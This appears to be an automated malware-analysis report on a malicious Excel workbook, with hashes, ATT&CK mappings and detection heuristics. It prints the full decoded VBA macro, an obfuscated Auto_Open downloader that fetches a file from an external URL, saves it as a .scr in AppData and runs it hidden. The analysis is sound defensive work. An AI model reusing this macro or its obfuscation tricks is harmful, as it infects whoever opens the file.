Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6c36554956617d29…

MALICIOUS

Office (OLE)

Size: 50.0 KB
Created: 2015-12-07 11:06:25
Authoring application: Microsoft Excel
First seen: 2019-11-20
MD5: 18711f1db99f6a6f73f8ab64f563accc
SHA-1: 1bf850ec4dacd43323e75be040ee6bc7a3d05fe9
SHA-256: 6c36554956617d2996a89a0ff7f867ee9b70769e4f1b70943fbf2babb8d97bfd
Risk Score: 378

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1059 Command and Scripting Interpreter

The VBA macro within the Excel file runs automatically (via Auto_Open) when the workbook is opened. It attempts to download a file from 'hTTP://afgcloud7.com/logs/ssc.mcom' and save it as 'fortyscan.scr' in the user's application data directory (Environ("appdata")). It then executes the downloaded file, which is downloader/dropper behaviour.

Heuristics (11)

  • ClamAV: Xls.Malware.Valyria-10008065-0 (critical; rule CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Malware.Valyria-10008065-0
  • VBA macros detected (medium; 6 related findings; rule OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA downloads and writes a file to disk (critical; rule OLE_VBA_HTTP_DROP_EXEC)
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        Call N1Oq.write(jgP8u.ResponseBody)
  • Obfuscated auto-exec VBA loader (critical; rule OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set jgP8u = CreateObject(Chr$(77) & Chr$(105) & Chr$(99) & Chr$(114) & Chr$(111) & Chr$(115) & Chr$(111) & Chr$(102) & Chr$(116) & Chr$(46) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(72) & Chr$(84) & Chr$(84) & Chr$(80))
  • CreateObject call (high; rule OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
        Set jgP8u = CreateObject(Chr$(77) & Chr$(105) & Chr$(99) & Chr$(114) & Chr$(111) & Chr$(115) & Chr$(111) & Chr$(102) & Chr$(116) & Chr$(46) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(72) & Chr$(84) & Chr$(84) & Chr$(80))
  • VBA p-code auto-exec with execution tokens (high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro (low; rule OLE_VBA_AUTO)
    Auto_Open macro
    Matched line in script
        Sub Auto_Open()
  • Environ() call (env variable access) (low; rule OLE_VBA_ENVIRON)
    Environ() call (env variable access)
    Matched line in script
       If FileAgaYiHaITo("hTTP://afgcloud7.com/logs/ssc.mcom", Environ("appdata") & "\fortyscan.scr") = True Then
  • Reference to ShellExecute API (high; rule SC_STR_SHELLEXEC)
    Reference to ShellExecute API
  • Suspicious extracted artifact (high; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: hTTP://afgcloud7.com/logs/ssc.mcom (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10087 bytes
SHA-256: a296ba7a6e316956040132be679fe1881ddb4491c3722eb36c4d58d89ca2cc4b
Detection: ClamAV: No threats found
Obfuscation or payload: likely (150 of 204 identifiers look randomly generated, e.g. 'lBQYajGBfhNTnvlQLLKP', which is consistent with name-mangling obfuscation)
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "Module1"
Sub Auto_Open()

Dim KMNdhGTasshT As Integer
 
   Dim a As Integer
   a = 5
   
   Dim b As Integer
   b = 10
   
   Dim c As Double
   
   c = a + b

   
   c = a - b

   
   c = a * b

   If FileAgaYiHaITo("hTTP://afgcloud7.com/logs/ssc.mcom", Environ("appdata") & "\fortyscan.scr") = True Then
   c = b / a

   
   c = b Mod a

   
   c = b ^ a
 
        
Call Svier(Environ("appdata") & "\fortyscan.scr", vbHide)
   
  End If

End Sub
Public Function k9LWXV0s(TV9tLUV As String, jx68LS As String) As String
    Dim QLnhigm As Integer
    Dim hpIed As Integer
    Dim EsiLk As Integer
    For EsiLk = 1 To Len(jx68LS)
GoTo cjDLA
cjDLA:
GoTo axsVQDKdlbGBCAFqxEU:
ftOCMkfIJqKPYNtCCB:
ahoSgfvyBtRhaJsuOr = "JGpCc"
GoTo dkrVjiyBEwUkdMvx
QJtbeybftDZmZLn:
CnhJHYkjNHgdBNdy = "abcdef"
GoTo HkRjUcCcnhzwTpNGC
vVsFTBSEIiQTNgdzV:
        QLnhigm = QLnhigm + Asc(Mid$(jx68LS, EsiLk, 1))
GoTo AwHLavxGQKoEQr
jSekgrIJfgqNuYoTbu:
GBSQnIhaVhyMjVgDy = "dJMUKqzzy"
GoTo rQRSQVHAHmMyNRUL
NtdZNiYOdnVV:
QSfiwRTdniLbtNhbQwFF = "JunuZml"
GoTo vVsFTBSEIiQTNgdzV
QFFssTcpQkPoFRFDxP:
ahoSgfvyBtRhaJsuOr = "JGpCc"
GoTo jSekgrIJfgqNuYoTbu
EuajjimYQYCOOeild:
QSfiwRTdniLbtNhbQwFF = "JunuZml"
GoTo QJtbeybftDZmZLn
rQRSQVHAHmMyNRUL:
CnhJHYkjNHgdBNdy = "abcdef"
GoTo NtdZNiYOdnVV
dkrVjiyBEwUkdMvx:
DLYATzYpPpAuMwS = "NTPbsGO"
GoTo vLBEvUxcaIwRHy
AwHLavxGQKoEQr:
GoTo EuajjimYQYCOOeild
axsVQDKdlbGBCAFqxEU:
DLYATzYpPpAuMwS = "NTPbsGO"
GoTo QFFssTcpQkPoFRFDxP
HkRjUcCcnhzwTpNGC:
GBSQnIhaVhyMjVgDy = "dJMUKqzzy"
GoTo ftOCMkfIJqKPYNtCCB
vLBEvUxcaIwRHy:
    Next EsiLk
    For EsiLk = 1 To Len(TV9tLUV)
GoTo ZWm
ZWm:
GoTo zZzKEQFdMQd:
pxbonDHJBbqiSA:
VJSqlOQxQQfTzIJHMk = "ycpoE"
GoTo QzESdxKylLihJqHu
RIVgOOCCdm:
vjUwSRtbsfjIjuoG = "awUMIUl"
GoTo buaxPcPNHZQtdnt
BSTpqzQEixekD:
eYqnJfEJGRUkFGP = "UyhATODjstr"
GoTo QwrsqvgZgK
zZzKEQFdMQd:
KCcrjTBDZBFTPyMlmMV = "KeI"
GoTo HOfFEUKNFeHmkRG
QnrtlKnRCxmG:
GoTo oBMvuiTvResardh
buaxPcPNHZQtdnt:
hahLZYosumLbSDlnH = "pCN"
GoTo BSTpqzQEixekD
HOfFEUKNFeHmkRG:
VJSqlOQxQQfTzIJHMk = "ycpoE"
GoTo RIVgOOCCdm
QwrsqvgZgK:
        hpIed = Asc(Mid$(TV9tLUV, EsiLk, 1)) - QLnhigm - EsiLk
GoTo QnrtlKnRCxmG
oBMvuiTvResardh:
eYqnJfEJGRUkFGP = "UyhATODjstr"
GoTo vtnFCZvTZVhkzUVfp
NdwPjeSyHIGL:
vjUwSRtbsfjIjuoG = "awUMIUl"
GoTo pxbonDHJBbqiSA
vtnFCZvTZVhkzUVfp:
hahLZYosumLbSDlnH = "pCN"
GoTo NdwPjeSyHIGL
QzESdxKylLihJqHu:
KCcrjTBDZBFTPyMlmMV = "KeI"
GoTo lBQYajGBfhNTnvlQLLKP
lBQYajGBfhNTnvlQLLKP:
        Do Until hpIed > 0
GoTo QgW
QgW:
GoTo PwCVeTzuvtyjckN:
CYZjsnQgzTmh:
lxatZwOoOaTmUsc = "soAQ"
GoTo CKLJOztAerqGKNEetmVD
FPyylYyUiwduh:
YYoegYxaECkZtkboz = "hUU"
GoTo KywqIFcyQdZk
DgzfDUuUgascy:
YYoegYxaECkZtkboz = "hUU"
GoTo tzvGYmuvFdY
bDHVgAOBoOlkMtLx:
             hpIed = 255 + hpIed
GoTo bBMGZVsOnfbnESo
tzvGYmuvFdY:
EQtMsPiuigaspLvGL = "TlmHIRqQ"
GoTo aquwoNqUFBpKA
CKLJOztAerqGKNEetmVD:
YZQczGNrEDTYbRrGyjQ = "oQUjfNcBB"
GoTo bDHVgAOBoOlkMtLx
PwCVeTzuvtyjckN:
EQtMsPiuigaspLvGL = "TlmHIRqQ"
GoTo FPyylYyUiwduh
uQbpmUiHHj:
rsBaTxzgmFNDjefd = "Sah"
GoTo DgzfDUuUgascy
bBMGZVsOnfbnESo:
GoTo lIDhjPkpxn
lIDhjPkpxn:
YZQczGNrEDTYbRrGyjQ = "oQUjfNcBB"
GoTo ccafCJQvHHQbeVxMFpQ
ccafCJQvHHQbeVxMFpQ:
lxatZwOoOaTmUsc = "soAQ"
GoTo uQbpmUiHHj
KywqIFcyQdZk:
rsBaTxzgmFNDjefd = "Sah"
GoTo CYZjsnQgzTmh
aquwoNqUFBpKA:
        Loop
GoTo vW
vW:
GoTo cKMhJNcmHUHuV:
ZwdGQDJdlaFBBAEqjq:
ykoNCztLIfBagcn = "Fbdmv"
GoTo vhwADvTxcLHwQGxLVii
LTJpkljoagnEfe:
GoTo kneDgLJrgAqhvF
hmIPQBONehk:
dtxArQtZIEtNDuISB = "obBYlz"
GoTo APIsbdxafs
tmitKZuisPKopVqvDtZi:
ykoNCztLIfBagcn = "Fbdmv"
GoTo hmIPQBONehk
APIsbdxafs:
PLQopKLVtaDSzGZhQCx = "wBngnQ"
GoTo YlKKmuHjCiGYy
vhwADvTxcLHwQGxLVii:
QnFatndIRRQVGzGly = "NQTLkz"
GoTo qSARDHiHSMfcz
obbCKYzTyQoAp:
PLQopKLVtaDSzGZhQCx = "wBngnQ"
GoTo gyvRBMSOarsN
YlKKmuHjCiGYy:
xnesCllYYzHUwPv = "lxljdvsOy"
GoTo kevfBlwCyJbqxyIgbEGm
kevfBlwCyJbqxyIgbEGm:
        k9LWXV0s = k9LWXV0s & Chr(hpIed)
GoTo LTJpkljoagnEfe
gyvRBMSOarsN:
dtxArQtZIEtNDuISB = "obBYlz"
GoTo ZwdGQDJdlaFBBAEqjq
kneDgLJrgAqhvF:
xnesCllYYzHUwPv = "lxljdvsOy"
GoTo obbCKYzTyQoAp
cKMhJNcmHUHuV:
QnFatndIRRQVGzGly = "NQTLkz"
GoTo tmitKZuisPKopVqvDtZi
qSARDHiHSMfcz:
    Next EsiLk
End Function




Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module2"
Function Area(x As Double, y As Double) As Double

Area = x * y

End Function
Function FileAgaYiHaITo(sUrl As String, sDropTo As String) As Boolean
    Dim jgP8u As Object
    Dim N1Oq As Object
    On Error GoTo ErrHandle:
GoTo cqdPqMLoUmZdCdoiA:
cqdPqMLoUmZdCdoiA:
GoTo mfP
mfP:
xdmnlqbUcFSRimogFUM = "fhCfjx"
GoTo LQZOuCDBGelsV
zNJsGggGPcEYDb:
ktRycrYexFvbVQUa = "DKpPBRVY"
GoTo StEyQAQGQQSfwK
ixSTeniLbuO:
    Call N1Oq.Close
GoTo cQwFGEJuovZ
LQZOuCDBGelsV:
hDayEALOezAJTOsH = "uN"
GoTo iyCFwVleNvyS
iyCFwVleNvyS:
pRwhcQlcSgraZMyawIQ = "VIMmaYR"
GoTo zNJsGggGPcEYDb
CQbvJwjJgfHoGsw:
ktRycrYexFvbVQUa = "DKpPBRVY"
GoTo wHBTQnJiaViyNjQgDyce
StEyQAQGQQSfwK:
PaJIwwYgsUoTrJVJHB = "QnQinkvMN"
GoTo nwUOsubhAIye
fksiNVQUaxELqCCRV:
hDayEALOezAJTOsH = "uN"
GoTo PpExhORmOShdMazzbjvY
AwkEvmAKtsgStPcrYpc:
    Call N1Oq.write(jgP8u.ResponseBody)
GoTo FtrlDAQtRYT
nwUOsubhAIye:
    Set jgP8u = CreateObject(Chr$(77) & Chr$(105) & Chr$(99) & Chr$(114) & Chr$(111) & Chr$(115) & Chr$(111) & Chr$(102) & Chr$(116) & Chr$(46) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(72) & Chr$(84) & Chr$(84) & Chr$(80))
GoTo aYdNUcsSSiZbSsUzxfTo
VjudcPPrzLo:
    Call jgP8u.Open("GET", sUrl, 0)
GoTo nKdpdbUnkGqBGDOgh
nKdpdbUnkGqBGDOgh:
GoTo HUItV
HUItV:
    Call jgP8u.Send
GoTo DMlRvKrxQZOupqot
wHBTQnJiaViyNjQgDyce:
pRwhcQlcSgraZMyawIQ = "VIMmaYR"
GoTo fksiNVQUaxELqCCRV
PpExhORmOShdMazzbjvY:
xdmnlqbUcFSRimogFUM = "fhCfjx"
GoTo TqOGCOfuPDMkfIK
aYdNUcsSSiZbSsUzxfTo:
    Set N1Oq = CreateObject(Chr$(65) & Chr$(100) & Chr$(111) & Chr$(100) & Chr$(98) & Chr$(46) & Chr$(83) & Chr$(116) & Chr$(114) & Chr$(101) & Chr$(97) & Chr$(109))
GoTo VjudcPPrzLo
DMlRvKrxQZOupqot:
    N1Oq.Type = 1
GoTo QfIkUlprjIl
lBFIzZogQyAV:
PaJIwwYgsUoTrJVJHB = "QnQinkvMN"
GoTo CQbvJwjJgfHoGsw
FtrlDAQtRYT:
    Call N1Oq.SaveToFile(sDropTo, 2)
GoTo ixSTeniLbuO
cQwFGEJuovZ:
GoTo lBFIzZogQyAV
QfIkUlprjIl:
    Call N1Oq.Open
GoTo AwkEvmAKtsgStPcrYpc
qSARD:
GoTo vyBtShaKsuO:
qNImoUbuCrQ:
GoTo SRQHNVmMLcRUMlOtrZN
pQlPoGgGRL:
    Exit Function
GoTo MkTekgsIYf
pPqBvNKhCcTP:
DmmaLnJVkRjUZznke = "uQmKQM"
GoTo sHdQaxsVYE
embGPQOTrxEjwvLPRJjy:
dbUnkGqBGDOghCDM = "RvKxQZOu"
GoTo Bbmg
Bbmg:
GoTo bIKfHMaQFSssT
MkTekgsIYf:
ErrHandle:
GoTo qNImoUbuCrQ
SRQHNVmMLcRUMlOtrZN:
dNUcsSSiZbSsUzxfTofV = "udcPrzLoHnKd"
GoTo ZOdnVVIJktF
TqOGCOfuPDMkfIK:
    FileAgaYiHaITo = True
GoTo qSARD
lrKSHojjinYQYCdO:
cqMNQhcFUnHbUKqzAyDo = "oSg"
GoTo NFBNd
NFBNd:
GoTo wJTpCqcDaZAiz
BgEQjQTNgdA:
qoteQfIkUlprjIlP = "peypg"
GoTo uAwIZavxGeLp
sHdQaxsVYE:
qoteQfIkUlprjIlP = "peypg"
GoTo embGPQOTrxEjwvLPRJjy
vyBtShaKsuO:
cqMNQhcFUnHbUKqzAyDo = "oSg"
GoTo HuFcX
HuFcX:
GoTo pPqBvNKhCcTP
uAwIZavxGeLp:
DmmaLnJVkRjUZznke = "uQmKQM"
GoTo lrKSHojjinYQYCdO
GoTo Ci
Ci:
ZOdnVVIJktF:
dbUnkGqBGDOghCDM = "RvKxQZOu"
GoTo IQ
IQ:
GoTo BgEQjQTNgdA
bIKfHMaQFSssT:
dNUcsSSiZbSsUzxfTofV = "udcPrzLoHnKd"
GoTo pQlPoGgGRL
wJTpCqcDaZAiz:
    FileAgaYiHaITo = False
End Function
Public Function Svier(ByVal RPVDuDd As String, ByVal yLPTJ As VbAppWinStyle) As Boolean
    On Error GoTo ErrHandle
GoTo Achy
Achy:
GoTo OidRxGHFKvpwan:
MrDDSQaQqFyiPSnP:
bZeOVdtTTjacTtV = "ygUpgQ"
GoTo ieNbAAbkqRmQpHhHSMf
CURoKjbQjzOkYhEzd:
ENmSwLsyRaPvqrpufY = "JlV"
GoTo LgltjOQYVby
lfxvRnLRNadrM:
qskJmQBxlFwnBLut = "TuQ"
GoTo YidGVoIcVLrABzEpip
OidRxGHFKvpwan:
rZqdhGusmEBYuSZ = "gjyTUfojMc"
GoTo RcwKxkKhgIpHtxQx
LgltjOQYVby:
vedQQsAMpIoLeqec = "olHrCHEPhi"
GoTo MrDDSQaQqFyiPSnP
MoKQlSkVaA:
ENmSwLsyRaPvqrpufY = "JlV"
GoTo lfxvRnLRNadrM
PusaOjZPeoQQ:
ErrHandle:
GoTo KluGjChFYjYUOheBl
RcwKxkKhgIpHtxQx:
qskJmQBxlFwnBLut = "TuQ"
GoTo CURoKjbQjzOkYhEzd
KuqfzqhuEnn:
vedQQsAMpIoLeqec = "olHrCHEPhi"
GoTo MoKQlSkVaA
BxJabwyHfMpFms:
GoTo TIpkkjoZRZDePgjmeC
TIpkkjoZRZDePgjmeC:
bZeOVdtTTjacTtV = "ygUpgQ"
GoTo KuqfzqhuEnn
ieNbAAbkqRmQpHhHSMf:
    Call CreateObject(Chr(83) & Chr(72) & Chr(101) & Chr(76) & Chr(108) & Chr$(46) & Chr$(65) & Chr$(112) & Chr$(112) & Chr$(108) & Chr$(105) & Chr$(99) & Chr$(97) & Chr$(116) & Chr$(105) & Chr$(111) & Chr$(110)).ShellExecute(RPVDuDd, vbNullString, vbNullString, vbNullString, yLPTJ)
GoTo lUflhtJZgirOJnpVcv
KluGjChFYjYUOheBl:
    ShellExecute = False
GoTo BxJabwyHfMpFms
lUflhtJZgirOJnpVcv:
    ShellExecute = True
GoTo sYTTSYIOQnNMdSVN
sYTTSYIOQnNMdSVN:
    Exit Function
GoTo PusaOjZPeoQQ
YidGVoIcVLrABzEpip:
rZqdhGusmEBYuSZ = "gjyTUfojMc"
GoTo CGJAaphRzBQz
CGJAaphRzBQz:
End Function